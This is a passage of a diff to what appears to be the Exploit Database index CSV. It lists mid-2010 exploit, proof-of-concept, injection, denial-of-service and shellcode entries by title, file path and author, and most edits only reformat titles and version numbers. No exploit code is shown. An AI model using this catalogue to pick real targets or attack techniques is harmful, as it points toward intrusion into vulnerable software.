V1.2 SQli vulnerability",2010-06-06,Sid3^effects,php,webapps,0 +13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces Upload Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 sqli vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System LFI Vulnerability",2010-06-06,AntiSecurity,php,webapps,0 13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload Vulnerability",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone Beta 2.0 SQLi and Xss vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF & XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 -13756,platforms/windows/local/13756.py,"VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass",2010-06-07,mr_me,windows,local,0 +13756,platforms/windows/local/13756.py,"VUPlayer <= 2.49 - (.m3u) Universal buffer overflow exploit w/ DEP bypass",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit",2010-06-07,Sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS Sql Injection Vulnerability",2010-06-07,Pokeng,php,webapps,0 @@ -12092,25 +12092,25 @@ id,file,description,date,author,platform,type,port 13766,platforms/php/webapps/13766.txt,"Authentication Bypass in Home of MCLogin System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit",2010-06-08,mr_me,windows,local,0 13768,platforms/php/local/13768.py,"Castripper 2.50.70 (.pls) stack buffer overflow w/ DEP bypass exploit",2010-06-08,mr_me,php,local,0 -13769,platforms/php/webapps/13769.txt,"CafeEngine CMS V2.3 SQLI Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 +13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager SQLi Vulnerable",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz Upload Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal Upload Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC",2010-06-08,"Dillon Beresford ",hardware,dos,80 13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford ",hardware,dos,80 -13776,platforms/php/webapps/13776.txt,"Multiple Permanent Cross-site Scripting in Phreebooks v2.0",2010-06-08,"Gustavo Sorondo",php,webapps,0 -13777,platforms/php/webapps/13777.txt,"Phreebooks v2.0 Local File Inclusion",2010-06-08,"Gustavo Sorondo",php,webapps,0 -13778,platforms/php/webapps/13778.txt,"Directory Traversal in Phreebooks v2.0",2010-06-08,"Gustavo Sorondo",php,webapps,0 +13776,platforms/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Permanent Cross-site Scripting",2010-06-08,"Gustavo Sorondo",php,webapps,0 +13777,platforms/php/webapps/13777.txt,"Phreebooks 2.0 - Local File Inclusion",2010-06-08,"Gustavo Sorondo",php,webapps,0 +13778,platforms/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",php,webapps,0 13779,platforms/php/webapps/13779.txt,"Pre Web Host SQL Injection Vulnerability",2010-06-08,Mr.Benladen,php,webapps,0 -13781,platforms/php/webapps/13781.txt,"phplist version 2.8.11 SQL Injection Vulnerability",2010-06-08,d3v1l,php,webapps,0 +13781,platforms/php/webapps/13781.txt,"phplist 2.8.11 - SQL Injection Vulnerability",2010-06-08,d3v1l,php,webapps,0 13782,platforms/php/webapps/13782.txt,"Image Store Remote file Upload Vulnerability",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House Directory Listing SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13785,platforms/php/webapps/13785.txt,"eLMS Pro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13786,platforms/php/webapps/13786.txt,"PGAUTOPro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 -13787,platforms/multiple/remote/13787.txt,"0day Exploit for Adobe Flash and Reader PoC (from the wild)",2010-06-09,unknown,multiple,remote,0 -13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 +13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - 0day Exploit PoC (from the wild)",2010-06-09,unknown,multiple,remote,0 +13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager V 3.5 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13790,platforms/asp/webapps/13790.txt,"iClone SQL Injection Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL injection Vulnerability",2010-06-09,Sudden_death,php,webapps,0 @@ -12126,11 +12126,11 @@ id,file,description,date,author,platform,type,port 13803,platforms/php/webapps/13803.txt,"PHPAccess SQLi Vulnerability",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13804,platforms/php/webapps/13804.txt,"joomla com_jnewsletter SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script SQLi & XSS Vulnerability",2010-06-09,"L0rd CrusAd3r",php,webapps,0 -13806,platforms/windows/local/13806.txt,"Buffer Overflow ActivePerl v5.8.8.817",2010-06-09,PoisonCode,windows,local,0 +13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.X - 1.4.X Exploit",2010-06-09,TinKode,php,webapps,0 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 13810,platforms/php/webapps/13810.php,"AWCM CMS Local File Inclusion Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0 -13812,platforms/php/webapps/13812.txt,"SchoolMation Version 2.3 SQLi and XSS Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 +13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi and XSS Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 13813,platforms/php/webapps/13813.html,"Store Locator Remote Add Admin Exploit CSRF Vulnerability",2010-06-10,JaMbA,php,webapps,0 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS <= 2.x SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 @@ -12138,7 +12138,7 @@ id,file,description,date,author,platform,type,port 13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability",2010-06-11,LiquidWorm,windows,dos,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities",2010-06-11,Dr_IDE,windows,remote,0 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace Multiple Vulns",2010-06-11,MizoZ,php,webapps,0 -13820,platforms/windows/local/13820.pl,"Power Tab Editor v1.7 (Build 80) Buffer Overflow",2010-06-11,Sud0,windows,local,0 +13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,Sud0,windows,local,0 13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability",2010-06-11,"Jose A. Vazquez",windows,remote,0 13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 @@ -12154,7 +12154,7 @@ id,file,description,date,author,platform,type,port 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0 -13837,platforms/windows/dos/13837.pl,"Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local DoS (PoC)",2010-06-12,R3d-D3v!L,windows,dos,0 +13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3v!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version Denial of Service",2010-06-12,chap0,windows,dos,0 13840,platforms/asp/webapps/13840.txt,"VU Case Manager Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13841,platforms/asp/webapps/13841.txt,"VU Mass Mailer Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 @@ -12183,20 +12183,20 @@ id,file,description,date,author,platform,type,port 13865,platforms/php/webapps/13865.txt,"Daily Inspirational Quotes Script SQL Injection Vulnerability",2010-06-14,Valentin,php,webapps,0 13866,platforms/php/webapps/13866.txt,"Joke Website Script SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-14,Valentin,php,webapps,0 13867,platforms/php/webapps/13867.txt,"E-Book Store SQL Injection Vulnerability",2010-06-14,Valentin,php,webapps,0 -13870,platforms/hardware/dos/13870.py,"QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0 -13871,platforms/hardware/dos/13871.py,"Impact PDF Reader v2.0 for iPhone/iPod Touch POST Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0 -13872,platforms/windows/dos/13872.txt,"SumatraPDF v1.1 Denial of Service PoC",2010-06-14,"Matthew Bergin",windows,dos,0 +13870,platforms/hardware/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0 +13871,platforms/hardware/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0 +13872,platforms/windows/dos/13872.txt,"SumatraPDF 1.1 - Denial of Service PoC",2010-06-14,"Matthew Bergin",windows,dos,0 13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 -13876,platforms/windows/dos/13876.py,"File Sharing Wizard v1.5.0 Buffer Overflow PoC",2010-06-15,m-1-k-3,windows,dos,0 +13876,platforms/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow PoC",2010-06-15,m-1-k-3,windows,dos,0 13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey XSS and SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro SQL Injection Auth Bypass Vulnerability",2010-06-15,"L0rd CrusAd3r",php,webapps,0 13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System user_login.asp SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13883,platforms/asp/webapps/13883.txt,"Business Classified Listing SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 -13885,platforms/asp/webapps/13885.txt,"Acuity CMS v2.7.1 SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 +13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection Vulnerability",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13886,platforms/asp/webapps/13886.txt,"IISWorks FileMan fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,asp,webapps,0 13887,platforms/windows/dos/13887.c,"Winplot 2010 Buffer Overflow PoC",2010-06-15,"fl0 fl0w",windows,dos,0 -13888,platforms/windows/dos/13888.c,"SasCam v2.6.5 Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos,0 +13888,platforms/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos,0 13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0 @@ -12210,16 +12210,16 @@ id,file,description,date,author,platform,type,port 13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0 13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery SQL Vulnerability",2010-06-17,"L0rd CrusAd3r",asp,webapps,0 -13903,platforms/windows/remote/13903.py,"File Sharing Wizard Version 1.5.0 (SEH) Exploit",2010-06-17,b0nd,windows,remote,0 +13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [CSRF] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0 -13905,platforms/windows/local/13905.py,"BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7",2010-06-17,mr_me,windows,local,0 +13905,platforms/windows/local/13905.py,"BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7",2010-06-17,mr_me,windows,local,0 13906,platforms/novell/dos/13906.txt,"Netware SMB Remote Stack Overflow PoC",2010-06-17,"Laurent Gaffie",novell,dos,139 -13907,platforms/windows/local/13907.py,"Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 +13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security - 143 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 -13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 +13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition <= 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13910,platforms/lin_x86/shellcode/13910.c,"Polymorphic Bindport 31337 with setreuid (0,0) linux/x86",2010-06-17,gunslinger_,lin_x86,shellcode,0 13911,platforms/php/webapps/13911.txt,"Live CMS SQL Injection Vulnerability",2010-06-17,ahwak2000,php,webapps,0 -13912,platforms/php/webapps/13912.txt,"Havij Persistent XSS (<=v1.10)",2010-06-17,hexon,php,webapps,0 +13912,platforms/php/webapps/13912.txt,"Havij <= 1.10 - Persistent XSS",2010-06-17,Hexon,php,webapps,0 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (""/etc/passwd"", 0777) & exit(0) - 63 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 @@ -12227,7 +12227,7 @@ id,file,description,date,author,platform,type,port 13920,platforms/windows/dos/13920.c,"H264WebCam Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0 13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13922,platforms/php/webapps/13922.txt,"Joomla Component com_joomdocs XSS Vulnerability",2010-06-18,Sid3^effects,php,webapps,0 -13923,platforms/php/webapps/13923.txt,"Joomla Component Answers v2.3beta Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 +13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13925,platforms/php/webapps/13925.txt,"Joomla Component Ozio Gallery 2 Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13926,platforms/php/webapps/13926.txt,"Joomla Component Listbingo 1.3 Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13927,platforms/php/webapps/13927.txt,"MarketSaz remote file Upload Vulnerability",2010-06-18,NetQurd,php,webapps,0 @@ -12238,11 +12238,11 @@ id,file,description,date,author,platform,type,port 13933,platforms/php/webapps/13933.txt,"UK One Media CMS (id) Error Based SQL Injection Vulnerability",2010-06-19,LiquidWorm,php,webapps,0 13934,platforms/windows/dos/13934.py,"MoreAmp (.maf) Buffer Overflow POC",2010-06-19,Sid3^effects,windows,dos,0 13935,platforms/php/webapps/13935.txt,"Joomla Component RSComments 1.0.0 Persistent XSS",2010-06-19,jdc,php,webapps,0 -13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders v3.5 SQL Injection Vulnerability (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 -13937,platforms/php/webapps/13937.txt,"SnowCade v3 SQL Injection Vulnerability",2010-06-19,ahwak2000,php,webapps,0 +13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection Vulnerability (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 +13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection Vulnerability",2010-06-19,ahwak2000,php,webapps,0 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 CSRF Proof of Concept",2010-06-19,"Luis Santana",php,webapps,0 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor buffer overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 -13940,platforms/windows/local/13940.pl,"Orbital Viewer v1.04 (.ov) Local Universal Stack Overflow Exploit [SEH]",2010-06-19,Crazy_Hacker,windows,local,0 +13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp (.maf) local Stack Buffer Overflow (SEH) (calc)",2010-06-20,MadjiX,windows,local,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user with password - 390 bytes",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 13944,platforms/php/webapps/13944.txt,"SimpleAssets Authentication Bypass & XSS Vulnerability",2010-06-20,"L0rd CrusAd3r",php,webapps,0 @@ -12256,14 +12256,14 @@ id,file,description,date,author,platform,type,port 13954,platforms/php/webapps/13954.txt,"G.CMS Generator SQL Injection Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 13955,platforms/php/webapps/13955.txt,"Joomla Template BizWeb com_community Persistent XSS Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate RFI Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 -13957,platforms/php/webapps/13957.txt,"myUPB <= v2.2.6 Multiple Vulnerabilities",2010-06-21,altbta,php,webapps,0 +13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,altbta,php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"Teamspeak <= 3.0.0-beta25 Multiple Remote Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 Cross Site Request Forgery Vulnerability",2010-06-21,"Jeremiah Talamantes",php,webapps,0 -13961,platforms/php/webapps/13961.txt,"Alpin CMS v1.0 SQL Injection Vulnerability",2010-06-21,"Th3 RDX",php,webapps,0 +13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection Vulnerability",2010-06-21,"Th3 RDX",php,webapps,0 13962,platforms/php/webapps/13962.txt,"Joomla Component JomSocial 1.6.288 Multiple XSS",2010-06-21,jdc,php,webapps,0 -13964,platforms/php/webapps/13964.txt,"Linker IMG <=1.0 Remote File Inclusion Vulnerability",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0 -13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard v3.0.0 SEH POC",2010-06-22,Blake,windows,dos,0 +13964,platforms/php/webapps/13964.txt,"Linker IMG <= 1.0 - Remote File Inclusion Vulnerability",2010-06-21,"Sn!pEr.S!Te hacker",php,webapps,0 +13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH POC",2010-06-22,Blake,windows,dos,0 13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 Remote File Disclosure Vulnerability",2010-06-22,Xa7m3d,php,webapps,0 13967,platforms/php/webapps/13967.txt,"Online Classified System Script SQL Injection and XSS Vulnerabilities",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13969,platforms/php/webapps/13969.txt,"Job Search Script SQL Injection Vulnerability",2010-06-22,"L0rd CrusAd3r",php,webapps,0 @@ -12276,35 +12276,35 @@ id,file,description,date,author,platform,type,port 13978,platforms/php/webapps/13978.txt,"Job Search Engine Script SQL Injection Vulnerability",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13979,platforms/php/webapps/13979.txt,"Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability",2010-06-22,v3n0m,php,webapps,0 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS SQL Injection Vulnerability",2010-06-22,"Th3 RDX",php,webapps,0 -13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery LFI vulnerability",2010-06-22,kaMtiEz,php,webapps,0 -13982,platforms/php/webapps/13982.txt,"Alpin CMS SQL Injection Vulnerability (e4700.asp?id)",2010-06-22,CoBRa_21,php,webapps,0 +13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery LFI vulnerability",2010-06-22,kaMtiEz,php,webapps,0 +13982,platforms/php/webapps/13982.txt,"Alpin CMS SQL Injection Vulnerability (e4700.asp?id)",2010-06-22,CoBRa_21,php,webapps,0 13983,platforms/php/webapps/13983.txt,"Greeting card SQL Injection Vulnerability",2010-06-22,Net.Edit0r,php,webapps,0 13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script Blind SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13987,platforms/php/webapps/13987.txt,"Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 -13988,platforms/php/webapps/13988.txt,"PHP Event Calendar <= v1.5 Multiple Vulnerabilities",2010-06-22,cp77fk4r,php,webapps,0 +13988,platforms/php/webapps/13988.txt,"PHP Event Calendar <= 1.5 - Multiple Vulnerabilities",2010-06-22,cp77fk4r,php,webapps,0 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection Vulnerability",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13993,platforms/php/webapps/13993.txt,"K-Search (SQL/XSS) Multiple Remote Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection Vulnerability",2010-06-23,CoBRa_21,asp,webapps,0 -13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0 +13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar SQL Injection Vulnerability",2010-06-23,"L0rd CrusAd3r",php,webapps,0 -13998,platforms/windows/local/13998.pl,"BlazeDVD v6 (.plf) SEH universale Buffer Overflow",2010-06-23,MadjiX,windows,local,0 -13999,platforms/php/webapps/13999.html,"Software Index (Remote File Upload) Exploit",2010-06-23,indoushka,php,webapps,0 -14000,platforms/php/webapps/14000.txt,"PishBini Footbal XSS and SQL Injection Vulnerability",2010-06-23,indoushka,php,webapps,0 -14001,platforms/multiple/webapps/14001.txt,"Arbitrary File Download in InterScan Web Security Virtual Appliance 5.0",2010-06-23,"Ivan Huertas",multiple,webapps,0 +13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - (.plf) SEH universale Buffer Overflow",2010-06-23,MadjiX,windows,local,0 +13999,platforms/php/webapps/13999.html,"Software Index (Remote File Upload) Exploit",2010-06-23,"indoushka salah el ddine",php,webapps,0 +14000,platforms/php/webapps/14000.txt,"PishBini Footbal XSS and SQL Injection Vulnerability",2010-06-23,"indoushka salah el ddine",php,webapps,0 +14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 Arbitrary file upload",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2daybiz MLM Script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14006,platforms/multiple/webapps/14006.txt,"InterScan Web Security 5.0 Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 -14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14010,platforms/novell/dos/14010.txt,"Novell iManager Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 -14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software v3.2 Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 +14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server Denial of Service Vulnerability",2010-06-24,Crash,multiple,dos,80 -14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion v2.2.1 Remote Arbitrary Code Execution Vulnerability",2010-06-24,"Jason Geffner",windows,remote,0 +14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code 